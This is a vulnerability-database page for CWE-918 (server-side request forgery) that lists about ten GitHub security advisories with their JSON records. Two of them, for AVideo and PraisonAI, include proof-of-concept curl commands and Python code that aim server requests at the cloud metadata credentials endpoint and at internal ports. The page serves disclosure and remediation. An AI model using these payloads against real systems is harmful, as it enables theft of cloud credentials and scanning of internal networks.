Common Weakness Enumeration

CWE-918

Allowed

Server-Side Request Forgery (SSRF)

Abstraction: Base · Status: Incomplete

The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.

4592 vulnerabilities reference this CWE, most recent first.

GHSA-X5C9-RRJF-32HG

Vulnerability from github – Published: 2024-04-18 12:30 – Updated: 2026-04-28 21:34
VLAI
Details

Server-Side Request Forgery (SSRF) vulnerability in Really Simple Plugins Really Simple SSL.This issue affects Really Simple SSL: from n/a through 7.2.3.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-31229"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-04-18T11:15:37Z",
    "severity": "MODERATE"
  },
  "details": "Server-Side Request Forgery (SSRF) vulnerability in Really Simple Plugins Really Simple SSL.This issue affects Really Simple SSL: from n/a through 7.2.3.",
  "id": "GHSA-x5c9-rrjf-32hg",
  "modified": "2026-04-28T21:34:51Z",
  "published": "2024-04-18T12:30:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31229"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/really-simple-ssl/wordpress-really-simple-ssl-plugin-7-2-3-server-side-request-forgery-ssrf-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-X5R2-HJ5C-8JX6

Vulnerability from github – Published: 2021-02-11 20:42 – Updated: 2025-10-22 19:05
VLAI
Summary
SSRF in adminer
Details

Impact

Users of Adminer versions bundling all drivers (e.g. adminer.php) are affected.

Patches

Patched by ccd2374b, included in version 4.7.9.

Workarounds

  • Use a single driver version (e.g. adminer-mysql.php).
  • Protect access to Adminer also by other means, e.g. by HTTP password, IP address limiting or by OTP plugin.

References

https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf

For more information

If you have any questions or comments about this advisory: * Comment at ccd2374b.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "vrana/adminer"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.7.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-21311"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-02-11T20:42:04Z",
    "nvd_published_at": "2021-02-11T21:15:00Z",
    "severity": "HIGH"
  },
  "details": "### Impact\nUsers of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected.\n\n### Patches\nPatched by ccd2374b, included in version [4.7.9](https://github.com/vrana/adminer/releases/tag/v4.7.9).\n\n### Workarounds\n* Use a single driver version (e.g. `adminer-mysql.php`).\n* Protect access to Adminer also by other means, e.g. by HTTP password, IP address limiting or by OTP [plugin](https://www.adminer.org/plugins/).\n\n### References\nhttps://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Comment at ccd2374b.",
  "id": "GHSA-x5r2-hj5c-8jx6",
  "modified": "2025-10-22T19:05:30Z",
  "published": "2021-02-11T20:42:59Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21311"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vrana/adminer"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00002.html"
    },
    {
      "type": "WEB",
      "url": "https://packagist.org/packages/vrana/adminer"
    },
    {
      "type": "WEB",
      "url": "https://sourceforge.net/p/adminer/news/2021/02/adminer-479-released"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-21311"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N/E:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SSRF in adminer"
}

GHSA-X5VX-VRPF-R45F

Vulnerability from github – Published: 2026-04-01 21:08 – Updated: 2026-04-01 21:08
VLAI
Summary
AVideo: Stored SSRF via Video EPG Link Missing isSSRFSafeURL() Validation
Details

Summary

The EPG (Electronic Program Guide) link feature in AVideo allows authenticated users with upload permissions to store arbitrary URLs that the server fetches on every EPG page visit. The URL is validated only with PHP's FILTER_VALIDATE_URL, which accepts internal network addresses. Although AVideo has a dedicated isSSRFSafeURL() function for preventing SSRF, it is not called in this code path. This results in a stored server-side request forgery vulnerability that can be used to scan internal networks, access cloud metadata services, and interact with internal services.

Details

When a user adds or edits a video, the EPG link is stored via objects/videoAddNew.json.php:119:

$obj->setEpg_link($_POST['epg_link']);

The only validation applied is FILTER_VALIDATE_URL, which accepts URLs targeting internal addresses such as http://127.0.0.1, http://169.254.169.254, or http://10.0.0.1.

Later, when the EPG data is parsed, the stored URL is fetched server-side at objects/EpgParser.php:358:

$this->content = @\file_get_contents($this->url);

The file_get_contents() function follows redirects and supports multiple protocols including http://, https://, ftp://, and depending on PHP configuration, php:// and other stream wrappers.

The codebase contains an isSSRFSafeURL() function that validates URLs against internal network ranges, but this function is not invoked anywhere in the EPG link processing path.

Because the URL is stored in the database, every subsequent visit to the EPG page re-triggers the server-side request. This makes the SSRF persistent and repeatable without further attacker interaction.

Proof of Concept

  1. Authenticate as a user with upload permissions.

  2. Create or edit a video and set the EPG link to an internal target:

# Target the cloud metadata service
curl -b "PHPSESSID=USER_SESSION" \
  -X POST "https://your-avideo-instance.com/objects/videoAddNew.json.php" \
  -d "title=Test+Video&epg_link=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
  1. Trigger the EPG parser by visiting the video's EPG page, or wait for the next page load that processes EPG data:
curl -b "PHPSESSID=USER_SESSION" \
  "https://your-avideo-instance.com/plugin/Live/view/Live_schedule/?videos_id=VIDEO_ID"
  1. To scan internal ports, set the EPG link to various internal addresses:
# Scan an internal service
curl -b "PHPSESSID=USER_SESSION" \
  -X POST "https://your-avideo-instance.com/objects/videoAddNew.json.php" \
  -d "title=Test+Video&epg_link=http://127.0.0.1:6379/"
  1. The server fetches the URL via file_get_contents(). Response differences (timing, error messages, or returned content via EPG display) reveal whether internal services are running.

Impact

An authenticated user with upload permissions can force the AVideo server to make HTTP requests to arbitrary internal and external targets. This enables scanning of internal networks, access to cloud instance metadata (potentially exposing IAM credentials on AWS/GCP/Azure), and interaction with internal services that are not intended to be externally accessible. The stored nature of this SSRF means it re-executes on every page visit, amplifying the impact.

  • CWE-918: Server-Side Request Forgery (SSRF)
  • Severity: Medium

Recommended Fix

Add an isSSRFSafeURL() check before the file_get_contents() call at objects/EpgParser.php:355:

if (function_exists('isSSRFSafeURL') && !isSSRFSafeURL($this->url)) {
    throw new \RuntimeException('URL blocked by SSRF protection');
}

This reuses the existing SSRF protection function that is already applied in other code paths.


Found by aisafe.io

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34740"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-01T21:08:40Z",
    "nvd_published_at": "2026-03-31T21:16:32Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe EPG (Electronic Program Guide) link feature in AVideo allows authenticated users with upload permissions to store arbitrary URLs that the server fetches on every EPG page visit. The URL is validated only with PHP\u0027s `FILTER_VALIDATE_URL`, which accepts internal network addresses. Although AVideo has a dedicated `isSSRFSafeURL()` function for preventing SSRF, it is not called in this code path. This results in a stored server-side request forgery vulnerability that can be used to scan internal networks, access cloud metadata services, and interact with internal services.\n\n## Details\n\nWhen a user adds or edits a video, the EPG link is stored via `objects/videoAddNew.json.php:119`:\n\n```php\n$obj-\u003esetEpg_link($_POST[\u0027epg_link\u0027]);\n```\n\nThe only validation applied is `FILTER_VALIDATE_URL`, which accepts URLs targeting internal addresses such as `http://127.0.0.1`, `http://169.254.169.254`, or `http://10.0.0.1`.\n\nLater, when the EPG data is parsed, the stored URL is fetched server-side at `objects/EpgParser.php:358`:\n\n```php\n$this-\u003econtent = @\\file_get_contents($this-\u003eurl);\n```\n\nThe `file_get_contents()` function follows redirects and supports multiple protocols including `http://`, `https://`, `ftp://`, and depending on PHP configuration, `php://` and other stream wrappers.\n\nThe codebase contains an `isSSRFSafeURL()` function that validates URLs against internal network ranges, but this function is not invoked anywhere in the EPG link processing path.\n\nBecause the URL is stored in the database, every subsequent visit to the EPG page re-triggers the server-side request. This makes the SSRF persistent and repeatable without further attacker interaction.\n\n## Proof of Concept\n\n1. Authenticate as a user with upload permissions.\n\n2. Create or edit a video and set the EPG link to an internal target:\n\n```bash\n# Target the cloud metadata service\ncurl -b \"PHPSESSID=USER_SESSION\" \\\n  -X POST \"https://your-avideo-instance.com/objects/videoAddNew.json.php\" \\\n  -d \"title=Test+Video\u0026epg_link=http://169.254.169.254/latest/meta-data/iam/security-credentials/\"\n```\n\n3. Trigger the EPG parser by visiting the video\u0027s EPG page, or wait for the next page load that processes EPG data:\n\n```bash\ncurl -b \"PHPSESSID=USER_SESSION\" \\\n  \"https://your-avideo-instance.com/plugin/Live/view/Live_schedule/?videos_id=VIDEO_ID\"\n```\n\n4. To scan internal ports, set the EPG link to various internal addresses:\n\n```bash\n# Scan an internal service\ncurl -b \"PHPSESSID=USER_SESSION\" \\\n  -X POST \"https://your-avideo-instance.com/objects/videoAddNew.json.php\" \\\n  -d \"title=Test+Video\u0026epg_link=http://127.0.0.1:6379/\"\n```\n\n5. The server fetches the URL via `file_get_contents()`. Response differences (timing, error messages, or returned content via EPG display) reveal whether internal services are running.\n\n## Impact\n\nAn authenticated user with upload permissions can force the AVideo server to make HTTP requests to arbitrary internal and external targets. This enables scanning of internal networks, access to cloud instance metadata (potentially exposing IAM credentials on AWS/GCP/Azure), and interaction with internal services that are not intended to be externally accessible. The stored nature of this SSRF means it re-executes on every page visit, amplifying the impact.\n\n- **CWE-918**: Server-Side Request Forgery (SSRF)\n- **Severity**: Medium\n\n## Recommended Fix\n\nAdd an `isSSRFSafeURL()` check before the `file_get_contents()` call at `objects/EpgParser.php:355`:\n\n```php\nif (function_exists(\u0027isSSRFSafeURL\u0027) \u0026\u0026 !isSSRFSafeURL($this-\u003eurl)) {\n    throw new \\RuntimeException(\u0027URL blocked by SSRF protection\u0027);\n}\n```\n\nThis reuses the existing SSRF protection function that is already applied in other code paths.\n\n---\n*Found by [aisafe.io](https://aisafe.io)*",
  "id": "GHSA-x5vx-vrpf-r45f",
  "modified": "2026-04-01T21:08:40Z",
  "published": "2026-04-01T21:08:40Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-x5vx-vrpf-r45f"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34740"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/677d1a314d46abce457c7b662afbb58b0d9f17a2"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo: Stored SSRF via Video EPG Link Missing isSSRFSafeURL() Validation"
}

GHSA-X63R-JX45-482M

Vulnerability from github – Published: 2026-03-09 18:31 – Updated: 2026-03-11 15:31
VLAI
Details

An issue pertaining to CWE-918: Server-Side Request Forgery was discovered in oslabs-beta ThermaKube master.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-70042"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-09T16:16:15Z",
    "severity": "CRITICAL"
  },
  "details": "An issue pertaining to CWE-918: Server-Side Request Forgery was discovered in oslabs-beta ThermaKube master.",
  "id": "GHSA-x63r-jx45-482m",
  "modified": "2026-03-11T15:31:36Z",
  "published": "2026-03-09T18:31:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70042"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/zcxlighthouse/5a6d15611456de619e4be36f7d2a0ee7"
    },
    {
      "type": "WEB",
      "url": "https://github.com/oslabs-beta"
    },
    {
      "type": "WEB",
      "url": "https://github.com/oslabs-beta/ThermaKube"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-X698-9G95-CHP7

Vulnerability from github – Published: 2023-06-08 21:30 – Updated: 2024-04-04 04:40
VLAI
Details

Pydio Cells through 4.1.2 allows SSRF. For longer running processes, Pydio Cells allows for the creation of jobs, which are run in the background. The job "remote-download" can be used to cause the backend to send a HTTP GET request to a specified URL and save the response to a new file. The response file is then available in a user-specified folder in Pydio Cells.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-32750"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-06-08T21:15:17Z",
    "severity": "MODERATE"
  },
  "details": "Pydio Cells through 4.1.2 allows SSRF. For longer running processes, Pydio Cells allows for the creation of jobs, which are run in the background. The job \"remote-download\" can be used to cause the backend to send a HTTP GET request to a specified URL and save the response to a new file. The response file is then available in a user-specified folder in Pydio Cells.",
  "id": "GHSA-x698-9g95-chp7",
  "modified": "2024-04-04T04:40:57Z",
  "published": "2023-06-08T21:30:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32750"
    },
    {
      "type": "WEB",
      "url": "https://www.redteam-pentesting.de/advisories/rt-sa-2023-005"
    },
    {
      "type": "WEB",
      "url": "https://www.redteam-pentesting.de/en/advisories/-advisories-publicised-vulnerability-analyses"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-X6F8-H6VP-666P

Vulnerability from github – Published: 2025-08-26 00:31 – Updated: 2025-08-26 18:31
VLAI
Details

Rebuild v3.7.7 was discovered to contain a Server-Side Request Forgery (SSRF) via the type parameter in the com.rebuild.web.admin.rbstore.RBStoreController#loadDataIndex method.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-46413"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-25T15:15:35Z",
    "severity": "MODERATE"
  },
  "details": "Rebuild v3.7.7 was discovered to contain a Server-Side Request Forgery (SSRF) via the type parameter in the com.rebuild.web.admin.rbstore.RBStoreController#loadDataIndex method.",
  "id": "GHSA-x6f8-h6vp-666p",
  "modified": "2025-08-26T18:31:14Z",
  "published": "2025-08-26T00:31:13Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46413"
    },
    {
      "type": "WEB",
      "url": "https://github.com/RacerZ-fighting/CVE-vulns/blob/main/rebuild%203.7.7.md"
    },
    {
      "type": "WEB",
      "url": "https://github.com/RacerZ-fighting/rebuild-vulns/blob/main/rebuild%203.7.7.md"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-X6M9-GXVR-7JPV

Vulnerability from github – Published: 2026-04-01 23:21 – Updated: 2026-04-06 22:54
VLAI
Summary
PraisonAI: SSRF via Unvalidated api_base in passthrough() Fallback
Details

Summary

passthrough() and apassthrough() in praisonai accept a caller-controlled api_base parameter that is concatenated with endpoint and passed directly to httpx.Client.request() when the litellm primary path raises AttributeError. No URL scheme validation, private IP filtering, or domain allowlist is applied, allowing requests to any host reachable from the server.

Details

passthrough.py:92 (source) -> passthrough.py:109 (fallback trigger) -> passthrough.py:110 (sink)

# source -- api_base taken directly from caller
def passthrough(endpoint, api_base=None, method="GET", ...):

# fallback trigger -- AttributeError from unrecognised provider enters fallback
except AttributeError:
    url = f"{api_base or 'https://api.openai.com'}{endpoint}"

# sink -- no validation before request
    response = client.request(method, url=url, ...)

PoC

# tested on: praisonai 1.5.87 (source install)
# install: pip install -e src/praisonai
# start listener: python3 -m http.server 8888
import sys, litellm
sys.path.insert(0, 'src/praisonai')
del litellm.llm_passthrough_route

from praisonai.capabilities.passthrough import passthrough

result = passthrough(
    endpoint="/ssrf-test",
    api_base="http://127.0.0.1:8888",
    method="GET",
    custom_llm_provider="__nonexistent__",
)
print(result)
# expected output: PassthroughResult(data='...', status_code=404, headers={'server': 'SimpleHTTP/0.6 Python/3.12.3', ...})
# listener logs: "GET /ssrf-test HTTP/1.1" 404
# on EC2 with IMDSv1: api_base="http://169.254.169.254" returns IAM credentials

Impact

On cloud infrastructure with IMDSv1 enabled, an attacker can retrieve IAM credentials via the EC2 metadata service. Internal services (Redis, Elasticsearch, Kubernetes API) are reachable without authentication from within the VPC. The Flask API server deploys with AUTH_ENABLED = False by default, making this reachable over the network without credentials.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.5.89"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "praisonai"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.5.90"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34936"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-01T23:21:45Z",
    "nvd_published_at": "2026-04-03T23:17:05Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\n`passthrough()` and `apassthrough()` in `praisonai` accept a caller-controlled `api_base` parameter that is concatenated with `endpoint` and passed directly to `httpx.Client.request()` when the litellm primary path raises `AttributeError`. No URL scheme validation, private IP filtering, or domain allowlist is applied, allowing requests to any host reachable from the server.\n\n### Details\n\n`passthrough.py:92` (source) -\u003e `passthrough.py:109` (fallback trigger) -\u003e `passthrough.py:110` (sink)\n```python\n# source -- api_base taken directly from caller\ndef passthrough(endpoint, api_base=None, method=\"GET\", ...):\n\n# fallback trigger -- AttributeError from unrecognised provider enters fallback\nexcept AttributeError:\n    url = f\"{api_base or \u0027https://api.openai.com\u0027}{endpoint}\"\n\n# sink -- no validation before request\n    response = client.request(method, url=url, ...)\n```\n\n### PoC\n```python\n# tested on: praisonai 1.5.87 (source install)\n# install: pip install -e src/praisonai\n# start listener: python3 -m http.server 8888\nimport sys, litellm\nsys.path.insert(0, \u0027src/praisonai\u0027)\ndel litellm.llm_passthrough_route\n\nfrom praisonai.capabilities.passthrough import passthrough\n\nresult = passthrough(\n    endpoint=\"/ssrf-test\",\n    api_base=\"http://127.0.0.1:8888\",\n    method=\"GET\",\n    custom_llm_provider=\"__nonexistent__\",\n)\nprint(result)\n# expected output: PassthroughResult(data=\u0027...\u0027, status_code=404, headers={\u0027server\u0027: \u0027SimpleHTTP/0.6 Python/3.12.3\u0027, ...})\n# listener logs: \"GET /ssrf-test HTTP/1.1\" 404\n# on EC2 with IMDSv1: api_base=\"http://169.254.169.254\" returns IAM credentials\n```\n\n### Impact\n\nOn cloud infrastructure with IMDSv1 enabled, an attacker can retrieve IAM credentials via the EC2 metadata service. Internal services (Redis, Elasticsearch, Kubernetes API) are reachable without authentication from within the VPC. The Flask API server deploys with `AUTH_ENABLED = False` by default, making this reachable over the network without credentials.",
  "id": "GHSA-x6m9-gxvr-7jpv",
  "modified": "2026-04-06T22:54:03Z",
  "published": "2026-04-01T23:21:45Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-x6m9-gxvr-7jpv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34936"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/MervinPraison/PraisonAI"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PraisonAI: SSRF via Unvalidated api_base in passthrough() Fallback"
}

GHSA-X6MJ-W4JF-JMGW

Vulnerability from github – Published: 2022-02-15 01:57 – Updated: 2023-09-18 22:44
VLAI
Summary
Server Side Request Forgery (SSRF) in Kubernetes
Details

The Kubernetes kube-controller-manager in versions v1.0-1.14, versions prior to v1.15.12, v1.16.9, v1.17.5, and version v1.18.0 are vulnerable to a Server Side Request Forgery (SSRF) that allows certain authorized users to leak up to 500 bytes of arbitrary information from unprotected endpoints within the master's host network (such as link-local or loopback services).

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "k8s.io/kubernetes"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.18.0"
            },
            {
              "fixed": "1.18.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "k8s.io/kubernetes"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.17.0"
            },
            {
              "fixed": "1.17.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "k8s.io/kubernetes"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.16.0"
            },
            {
              "fixed": "1.16.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "k8s.io/kubernetes"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.15.12"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-8555"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-05-13T20:13:43Z",
    "nvd_published_at": "2020-06-05T17:15:00Z",
    "severity": "MODERATE"
  },
  "details": "The Kubernetes kube-controller-manager in versions v1.0-1.14, versions prior to v1.15.12, v1.16.9, v1.17.5, and version v1.18.0 are vulnerable to a Server Side Request Forgery (SSRF) that allows certain authorized users to leak up to 500 bytes of arbitrary information from unprotected endpoints within the master\u0027s host network (such as link-local or loopback services).",
  "id": "GHSA-x6mj-w4jf-jmgw",
  "modified": "2023-09-18T22:44:56Z",
  "published": "2022-02-15T01:57:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8555"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kubernetes/kubernetes/issues/91542"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kubernetes/kubernetes/pull/89794"
    },
    {
      "type": "WEB",
      "url": "https://groups.google.com/d/topic/kubernetes-security-announce/kEK27tqqs30/discussion"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3SOCLOPTSYABTE4CLTSPDIFE6ZZZR4LX"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20200724-0005"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2020/06/01/4"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2021/05/04/8"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Server Side Request Forgery (SSRF) in Kubernetes"
}

GHSA-X6V9-4FG2-25CW

Vulnerability from github – Published: 2023-09-16 09:30 – Updated: 2024-04-04 07:42
VLAI
Details

The Dropbox Folder Share plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including, 1.9.7 via the 'link' parameter. This can allow unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-3025"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-09-16T09:15:07Z",
    "severity": "HIGH"
  },
  "details": "The Dropbox Folder Share plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including, 1.9.7 via the \u0027link\u0027 parameter. This can allow unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.",
  "id": "GHSA-x6v9-4fg2-25cw",
  "modified": "2024-04-04T07:42:49Z",
  "published": "2023-09-16T09:30:13Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3025"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/dropbox-folder-share/trunk/HynoTech/DropboxFolderShare/Principal.php#L118"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d62bd2bd-db01-479f-89e4-8031d69a912f?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-X757-HV69-JR45

Vulnerability from github – Published: 2025-03-20 12:32 – Updated: 2025-03-21 21:16
VLAI
Summary
Open WebUI has SSRF in /openai/models
Details

The /openai/models endpoint in open-webui/open-webui version 0.3.8 is vulnerable to Server-Side Request Forgery (SSRF). An attacker can change the OpenAI URL to any URL without checks, causing the endpoint to send a request to the specified URL and return the output. This vulnerability allows the attacker to access internal services and potentially gain command execution by accessing instance secrets.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "open-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.3.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-7959"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-21T21:16:29Z",
    "nvd_published_at": "2025-03-20T10:15:38Z",
    "severity": "HIGH"
  },
  "details": "The `/openai/models` endpoint in open-webui/open-webui version 0.3.8 is vulnerable to Server-Side Request Forgery (SSRF). An attacker can change the OpenAI URL to any URL without checks, causing the endpoint to send a request to the specified URL and return the output. This vulnerability allows the attacker to access internal services and potentially gain command execution by accessing instance secrets.",
  "id": "GHSA-x757-hv69-jr45",
  "modified": "2025-03-21T21:16:29Z",
  "published": "2025-03-20T12:32:46Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7959"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/open-webui/open-webui"
    },
    {
      "type": "WEB",
      "url": "https://huntr.com/bounties/3c8bea0a-d678-4d67-bb9c-2b5b610a2193"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Open WebUI has SSRF in /openai/models"
}

No mitigation information available for this CWE.

CAPEC-664: Server Side Request Forgery

An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.